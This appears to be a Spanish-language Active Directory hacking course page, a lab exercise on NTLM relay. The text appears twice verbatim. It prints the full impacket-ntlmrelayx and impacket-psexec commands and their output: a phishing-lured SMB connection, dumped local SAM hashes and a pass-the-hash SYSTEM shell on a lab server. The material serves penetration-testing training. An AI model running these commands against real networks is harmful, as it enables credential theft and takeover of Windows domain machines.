Hacking en Active Directory - [CPAD-100]

Utilizando impacket-ntlmrelayx

Anterior¿Que es NTLM?SiguienteAnálisis de impacket-ntlmrelayx

Última actualización hace 9 meses

¿Te fue útil?

Utilizando impacket-ntlmrelayx

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

OBJETIVO DEL EJERCICIO #14:

Utilizaimpacket-ntlmrelayxpara exponer servicios maliciosos con el objetivo de capturar los hashes de WebServer. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

impacket-ntlmrelayx es una herramienta del conjunto de herramientas Impacket, desarrollada por Fortra (anteriormente conocida como SecureAuth). Esta herramienta se utiliza para realizar ataques de retransmisión NTLM, una técnica que aprovecha la forma en que el protocolo NTLM (NT LAN Manager) maneja la autenticación en redes Windows

Para este ataque es necesario tener un VPC con IP Publica y desde alli configurar el responder.

┌──(root㉿kali)-[/home/kali]
└─# ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 02:01:36:bf:4e:ab brd ff:ff:ff:ff:ff:ff
    inet 10.0.1.174/24 brd 10.0.1.255 scope global dynamic eth0
       valid_lft 3498sec preferred_lft 3498sec
    inet6 fe80::1:36ff:febf:4eab/64 scope link
       valid_lft forever preferred_lft forever

┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Para este escenario estaremos apuntando hacia la IP 10.0.1.249 que corresponde a WebServer.

Te recomiendo revisar por medio de un escaneo de SMB este activo tecnologico.

Y ahora desde RDP en el servidor First-DC con la IP 10.0.1.100 vamos a simular que somos la victima.

En la evidencia previa, se puede apreciar un phising que trata de seducir al administrador de dominio a revisar el SMB de la IP del atacante: 10.0.1.174

Si la victima accediendo al recurso compartido malicioso, le saldra esto:

Y en nuestro impacket-ntlmrelayx, vamos a obtener lo siguiente:

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry

Te envitamos a leer la explicacion de este ataque de una manera mas detallada: Análisis de impacket-ntlmrelayx

En este punto podrias realizar una tecnica llamada pass the hash sobre la maquina 10.0.1.249 utilizando el hash de:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::

Te recomendamos la lectura de Pass-the-Hash (PtH)

┌──(root㉿kali)-[/home/kali]
└─# impacket-psexec -hashes :f47f6266f4bb428db65cd949e7537f52 Administrator@10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.0.1.249.....
[*] Found writable share ADMIN$
[*] Uploading file iHpDtPof.exe
[*] Opening SVCManager on 10.0.1.249.....
[*] Creating service yVzM on 10.0.1.249.....
[*] Starting service yVzM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
WebServer

C:\Windows\system32> ipconfig

Windows IP Configuration
Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%7
   IPv4 Address. . . . . . . . . . . : 10.0.1.249
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

Anterior¿Que es NTLM?SiguienteAnálisis de impacket-ntlmrelayx

Última actualización hace 9 meses

¿Te fue útil?

OBJETIVO DEL EJERCICIO #14:

Utilizaimpacket-ntlmrelayxpara exponer servicios maliciosos con el objetivo de capturar los hashes de WebServer. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.

Para este ataque es necesario tener un VPC con IP Publica y desde alli configurar el responder.

┌──(root㉿kali)-[/home/kali]
└─# ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 02:01:36:bf:4e:ab brd ff:ff:ff:ff:ff:ff
    inet 10.0.1.174/24 brd 10.0.1.255 scope global dynamic eth0
       valid_lft 3498sec preferred_lft 3498sec
    inet6 fe80::1:36ff:febf:4eab/64 scope link
       valid_lft forever preferred_lft forever

┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections

Para este escenario estaremos apuntando hacia la IP 10.0.1.249 que corresponde a WebServer.

Te recomiendo revisar por medio de un escaneo de SMB este activo tecnologico.

Y ahora desde RDP en el servidor First-DC con la IP 10.0.1.100 vamos a simular que somos la victima.

En la evidencia previa, se puede apreciar un phising que trata de seducir al administrador de dominio a revisar el SMB de la IP del atacante: 10.0.1.174

Si la victima accediendo al recurso compartido malicioso, le saldra esto:

Y en nuestro impacket-ntlmrelayx, vamos a obtener lo siguiente:

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry

Te envitamos a leer la explicacion de este ataque de una manera mas detallada: Análisis de impacket-ntlmrelayx

En este punto podrias realizar una tecnica llamada pass the hash sobre la maquina 10.0.1.249 utilizando el hash de:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::

Te recomendamos la lectura de Pass-the-Hash (PtH)

┌──(root㉿kali)-[/home/kali]
└─# impacket-psexec -hashes :f47f6266f4bb428db65cd949e7537f52 Administrator@10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.0.1.249.....
[*] Found writable share ADMIN$
[*] Uploading file iHpDtPof.exe
[*] Opening SVCManager on 10.0.1.249.....
[*] Creating service yVzM on 10.0.1.249.....
[*] Starting service yVzM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
WebServer

C:\Windows\system32> ipconfig

Windows IP Configuration
Ethernet adapter Ethernet 2:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::3dce:ac79:a1b0:7820%7
   IPv4 Address. . . . . . . . . . . : 10.0.1.249
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1